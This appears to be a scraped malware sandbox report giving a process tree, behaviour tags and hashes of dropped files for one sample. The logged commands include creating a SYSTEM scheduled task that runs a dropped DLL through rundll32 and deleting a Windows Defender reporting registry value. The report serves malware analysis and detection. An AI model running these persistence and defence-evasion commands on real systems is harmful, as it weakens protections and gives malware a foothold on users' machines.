C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DzcOFfJcFiDtUecWi" /SC once /ST 00:41:59 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nCvDbzSfnWcpLPar\nhuKlixG\MbuAGxX.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "DzcOFfJcFiDtUecWi"3⤵PID:1292
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1976
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nCvDbzSfnWcpLPar\nhuKlixG\MbuAGxX.dll",#1 /site_id 5254032⤵PID:1720
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nCvDbzSfnWcpLPar\nhuKlixG\MbuAGxX.dll",#1 /site_id 5254033⤵
- Loads dropped DLL
PID:1644
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1588
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:604
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1718174299-1632608844-1247996779-12563746881569283382781245596-424285501814503246"1⤵
- Windows security bypass
PID:1700
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-9351883311351263653-410777390-491322730273761400-1399412351450801674-556467769"1⤵
- Windows security bypass
PID:904
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1816
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52b2666f68dac823c2fa6e944b2434bd2
SHA1627b5f7ad65324ad6e8ba4caf5746c3315ab9c81
SHA2561252ca6ac9fd367cd38c0b5c24f8d03571fdabdc2a4adc5f03824cc0f2fcf421
SHA5122a9fe66e214bb3252a06002747c0097a1c2abf3cf56cd1c61527db3489e942c3b7e5c43d5e8fe1d0ba82463fa51bd69587b63e33e0a21afb7e9db8576e3e365b
-
Filesize
2KB
MD502e2e3e2db7546f00c163c64cfcdbea2
SHA115dacef805f3b58ccd0e322d1cfd44422204b450
SHA25609999f397961cb76e4084a93f686a2d454f956642ad30d9c3acea8f4ab934331
SHA512ff37450178031cdf04861586479fcf39c46d367922e5e838878bc13b1725b3633a56bf3625df2012682254b330cd7378e7a040c75dbaa8d4dfcddc3906d84aa7
-
Filesize
2KB
MD5a8b4a8013ce6b9d7ec04335de56033a3
SHA100dae44f746e39c76b0d5ce2fbcdef77f51b3937
SHA2565f8f22ae1a9f93f9a89d98d005f9ffa6d99a6f696caa2cc8fb193600e0d29a09
SHA512969f65cdb771bd3d9dc5800ce1299d26466f444261a9bdb133ffdfaf644b000b54ccff8171f6f040f43e4a3d7cb3cb0c6f09af923ddb3dc3db663761eff8e791
-
Filesize
2KB
MD5c70c0323db04618b214c85aaa039f852
SHA17b27fdadff0e8a118ae103acd2c60839bf5cd2ad
SHA256a7a0989eb9c26215eabc84be1d29abe6c8376f14e5c1aaf167b5ac6ec17412e3
SHA512499211b021f3be2871bb6755a978dcbc9ee3fdf54f71e26800b15a3b1e7d589a36f7d90a1a830a9c7a1dac552899ca5438e70ffa0283bb32b53e85bc94a35c80
-
Filesize
2KB
MD53015522062282b4543753abbccfab3bb
SHA19bbb35a236d13caeea9d8d28230ca215bb1f8639
SHA256967486e52aa62dc772bced823a666f8cf89aa5f410e99e9949bf775261e60f33
SHA51244786903b5d69c1820d9dbb6792b0c52640e5ff94cb1e3956d28a37e16ba6e3e6977ae77989773a59b669c0bec3ef95139961e36dfced2b575d03d403588f1fa
-
Filesize
6.8MB
MD54ebd99e72a30319f02655981292b7f28
SHA12db56001428191c7d28bdbfef08f630730de016d
SHA256f0be33fd640d2e1e3a53b702fbbcd5226939e8d73bebc22d166df755816e3b34
SHA512b4313c58ec2872a494193388cd5cb2c38c1f437f3f42e2222dad04a3a8af80ff6303a768942810bcbb9578f20dcb98b60585688fef83b73d6f3dcf25457207f5
-
Filesize
6.8MB
MD54ebd99e72a30319f02655981292b7f28
SHA12db56001428191c7d28bdbfef08f630730de016d
SHA256f0be33fd640d2e1e3a53b702fbbcd5226939e8d73bebc22d166df755816e3b34
SHA512b4313c58ec2872a494193388cd5cb2c38c1f437f3f42e2222dad04a3a8af80ff6303a768942810bcbb9578f20dcb98b60585688fef83b73d6f3dcf25457207f5
-
Filesize
6.3MB
MD55a7b4c04ac085ee8c28f532b838ad398
SHA1bca68f13ad339ac22f00b9b3754b9fdac3b1cb20
SHA256a842481dc1b053fd2d1403266135a04c823dfccfd672f90d29710128648e03b0
SHA5127cf0c745bccdee95167f2976a0d7782e879d87bd3d0abb54b346a9aa2e27843637815f1dfdae88c79b8ab5e81dde67fd357479afe1911afed91cc1b40cd41067
-
Filesize
6.3MB
MD55a7b4c04ac085ee8c28f532b838ad398
SHA1bca68f13ad339ac22f00b9b3754b9fdac3b1cb20
SHA256a842481dc1b053fd2d1403266135a04c823dfccfd672f90d29710128648e03b0
SHA5127cf0c745bccdee95167f2976a0d7782e879d87bd3d0abb54b346a9aa2e27843637815f1dfdae88c79b8ab5e81dde67fd357479afe1911afed91cc1b40cd41067
-
Filesize
6.8MB
MD54ebd99e72a30319f02655981292b7f28
SHA12db56001428191c7d28bdbfef08f630730de016d
SHA256f0be33fd640d2e1e3a53b702fbbcd5226939e8d73bebc22d166df755816e3b34
SHA512b4313c58ec2872a494193388cd5cb2c38c1f437f3f42e2222dad04a3a8af80ff6303a768942810bcbb9578f20dcb98b60585688fef83b73d6f3dcf25457207f5
-
Filesize
6.8MB
MD54ebd99e72a30319f02655981292b7f28
SHA12db56001428191c7d28bdbfef08f630730de016d
SHA256f0be33fd640d2e1e3a53b702fbbcd5226939e8d73bebc22d166df755816e3b34
SHA512b4313c58ec2872a494193388cd5cb2c38c1f437f3f42e2222dad04a3a8af80ff6303a768942810bcbb9578f20dcb98b60585688fef83b73d6f3dcf25457207f5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52af292464dbc0071da35b1bf94d08eae
SHA1a07cf673102628d42c74c4066ac6a1baa69a45b5
SHA2566a6b4277cf4c72959aa0739d8e7dd32bbc27b74b35bccf8c7179acf7ebc173e2
SHA51224cebb9cce18e81abe0557c478b217749cc96521f6cbdfd9e3b4c8a69338764d433654a2b8f77e5c7ccf97cc8fcdf563ccd662525acb6df179a198d1adfe2f3d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a7b752694fea3d0d2eabb828308456c6
SHA10d4cb56beaebd0dd704da6e74a3e6059b9037176
SHA2560328e13ddf08bca62d0ce7ca9a00ad1a0a9191c3c9c66b6956faa669704048ac
SHA5123d731be3d42ffb941fc45682745f9909551bee8589d8c3f55ded3fbb9073be0125de253d7ffb6294e211a3b681d6861af4f9588f8b146732d1a30010dc6af8d1
-
Filesize
8KB
MD5bcab2849e8a17e1341e41b6261f594b7
SHA1831a75b281cf095863d44f3d5c3e937cdfcff6d6
SHA256b21327052762a5f26c3dbbc142837eea4f4e3b7f48cdf1eecb42f1a68b73b240
SHA512a0e94b0abbc985ac51406674cb8c1bdf1e25ccc0bc170c53c16c01f07a1e438c0535f84aa9bc28c721aeecc9317ac57c411244a747bcc51a4490e852f0020a12
-
Filesize
6.8MB
MD54ebd99e72a30319f02655981292b7f28
SHA12db56001428191c7d28bdbfef08f630730de016d
SHA256f0be33fd640d2e1e3a53b702fbbcd5226939e8d73bebc22d166df755816e3b34
SHA512b4313c58ec2872a494193388cd5cb2c38c1f437f3f42e2222dad04a3a8af80ff6303a768942810bcbb9578f20dcb98b60585688fef83b73d6f3dcf25457207f5
-
Filesize
6.8MB
MD54ebd99e72a30319f02655981292b7f28
SHA12db56001428191c7d28bdbfef08f630730de016d
SHA256f0be33fd640d2e1e3a53b702fbbcd5226939e8d73bebc22d166df755816e3b34
SHA512b4313c58ec2872a494193388cd5cb2c38c1f437f3f42e2222dad04a3a8af80ff6303a768942810bcbb9578f20dcb98b60585688fef83b73d6f3dcf25457207f5
-
Filesize
6.2MB
MD59d9d536dea5b51571c25787d303c330f
SHA16b369ba9d2f107ef01bb4dabb28b33bff9571ef5
SHA256892d420eec4720b331e51ce0cbcf5912f3a9fa0976e98960bee30527fb30ff43
SHA512a6fe89b042432f712837f946a6444154f0d3344637015da6560e11704d84c54e2fb4aa46e3dc3353fa4a955e408ea731dee2184f8fa89cee3baedac98bf4b60b
-
Filesize
5KB
MD5a88a535e18340d37d1e80903c7edbf27
SHA1f7cf085e6f88a010cd96a0705d816866741a3567
SHA2563532ea1100bc865b55352ae7cf154e62122bbe8cfe3e0da884d719ee962f128f
SHA512681ec675b477cfaee79814a605e5b04c61a52575c2bae62615b9d1f2d6c39e2f86315ceebf6de42db6d3b2eddf22a5f838cd8f1f7b66987c0ca5d78b526e065d
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.8MB
MD54ebd99e72a30319f02655981292b7f28
SHA12db56001428191c7d28bdbfef08f630730de016d
SHA256f0be33fd640d2e1e3a53b702fbbcd5226939e8d73bebc22d166df755816e3b34
SHA512b4313c58ec2872a494193388cd5cb2c38c1f437f3f42e2222dad04a3a8af80ff6303a768942810bcbb9578f20dcb98b60585688fef83b73d6f3dcf25457207f5
-
Filesize
6.8MB
MD54ebd99e72a30319f02655981292b7f28
SHA12db56001428191c7d28bdbfef08f630730de016d
SHA256f0be33fd640d2e1e3a53b702fbbcd5226939e8d73bebc22d166df755816e3b34
SHA512b4313c58ec2872a494193388cd5cb2c38c1f437f3f42e2222dad04a3a8af80ff6303a768942810bcbb9578f20dcb98b60585688fef83b73d6f3dcf25457207f5
-
Filesize
6.8MB
MD54ebd99e72a30319f02655981292b7f28
SHA12db56001428191c7d28bdbfef08f630730de016d
SHA256f0be33fd640d2e1e3a53b702fbbcd5226939e8d73bebc22d166df755816e3b34
SHA512b4313c58ec2872a494193388cd5cb2c38c1f437f3f42e2222dad04a3a8af80ff6303a768942810bcbb9578f20dcb98b60585688fef83b73d6f3dcf25457207f5
-
Filesize
6.8MB
MD54ebd99e72a30319f02655981292b7f28
SHA12db56001428191c7d28bdbfef08f630730de016d
SHA256f0be33fd640d2e1e3a53b702fbbcd5226939e8d73bebc22d166df755816e3b34
SHA512b4313c58ec2872a494193388cd5cb2c38c1f437f3f42e2222dad04a3a8af80ff6303a768942810bcbb9578f20dcb98b60585688fef83b73d6f3dcf25457207f5
-
Filesize
6.3MB
MD55a7b4c04ac085ee8c28f532b838ad398
SHA1bca68f13ad339ac22f00b9b3754b9fdac3b1cb20
SHA256a842481dc1b053fd2d1403266135a04c823dfccfd672f90d29710128648e03b0
SHA5127cf0c745bccdee95167f2976a0d7782e879d87bd3d0abb54b346a9aa2e27843637815f1dfdae88c79b8ab5e81dde67fd357479afe1911afed91cc1b40cd41067
-
Filesize
6.3MB
MD55a7b4c04ac085ee8c28f532b838ad398
SHA1bca68f13ad339ac22f00b9b3754b9fdac3b1cb20
SHA256a842481dc1b053fd2d1403266135a04c823dfccfd672f90d29710128648e03b0
SHA5127cf0c745bccdee95167f2976a0d7782e879d87bd3d0abb54b346a9aa2e27843637815f1dfdae88c79b8ab5e81dde67fd357479afe1911afed91cc1b40cd41067
-
Filesize
6.3MB
MD55a7b4c04ac085ee8c28f532b838ad398
SHA1bca68f13ad339ac22f00b9b3754b9fdac3b1cb20
SHA256a842481dc1b053fd2d1403266135a04c823dfccfd672f90d29710128648e03b0
SHA5127cf0c745bccdee95167f2976a0d7782e879d87bd3d0abb54b346a9aa2e27843637815f1dfdae88c79b8ab5e81dde67fd357479afe1911afed91cc1b40cd41067
-
Filesize
6.3MB
MD55a7b4c04ac085ee8c28f532b838ad398
SHA1bca68f13ad339ac22f00b9b3754b9fdac3b1cb20
SHA256a842481dc1b053fd2d1403266135a04c823dfccfd672f90d29710128648e03b0
SHA5127cf0c745bccdee95167f2976a0d7782e879d87bd3d0abb54b346a9aa2e27843637815f1dfdae88c79b8ab5e81dde67fd357479afe1911afed91cc1b40cd41067
-
Filesize
1.7MB
MD543f6288fb4823a29642751e8e056d3b5
SHA13591d41b3712e1742a5d9498b45dfa8789f384b2
SHA25671027cea3e70be46799489b9691f115eb6900d59b8684c283c6e3048584e91e5
SHA51257fda49a2697087b0bf065deb19d6ed8806107040761b671984d4fab1e76be9e5fce82ce982155b484ed69aa00cf6b455d3108f2496a3510c46422909777fc28
-
Filesize
1.8MB
MD5214a5c0ac1be2daa6a75f6c474b5ca5e
SHA1c2dc37f2f4fc11834e81242597554670737fa122
SHA256831a1e09c068de941fc8ee50b1ef91957e767f874c69d15b149490c58a6d4f16
SHA512d5f6c26fd076acdb160861ee7f9c7e172823e43b3a45f01ac9e2cdddcd061e720e005af0e3afb57d38847b96680f1c12d19c6dedd96d3f6070a94ce988ed1ed0
-
Filesize
1.3MB
MD51c1189bcfb1ccbac1dc6d7c55b2a74f8
SHA17fa15cadb18bf3a2e7f02d36794e7cc1b3155862
SHA256b211f123d1f6296e627f1129378b144f49a17f942d482e74530d38a18bb7f182
SHA51235b57a32a3fb71e4e2d1b1b067d0203f7b774b6a0ab59c2c5bf60930c5e6438b6f0ac72f52e3297079b131af45535cc183b3be719c7f01e19c013c3cd7634de8
-
Filesize
1024KB
MD52d78c885e649ce5ac52ac48b5c457db4
SHA1a06e6d1dcc617a1e13a9f9a3e1f811e8b2c84a2b
SHA256f247002c412b2584ad14b6e4593fe8254216c215e43de507a32d3174d634b552
SHA51272f7841ba52edcf4a929dcba82475476bddd6736f37bac926d667920425b934decfd401733c610966d640ba8bda5713a48574c563fefa5fe8bde70afa034a00a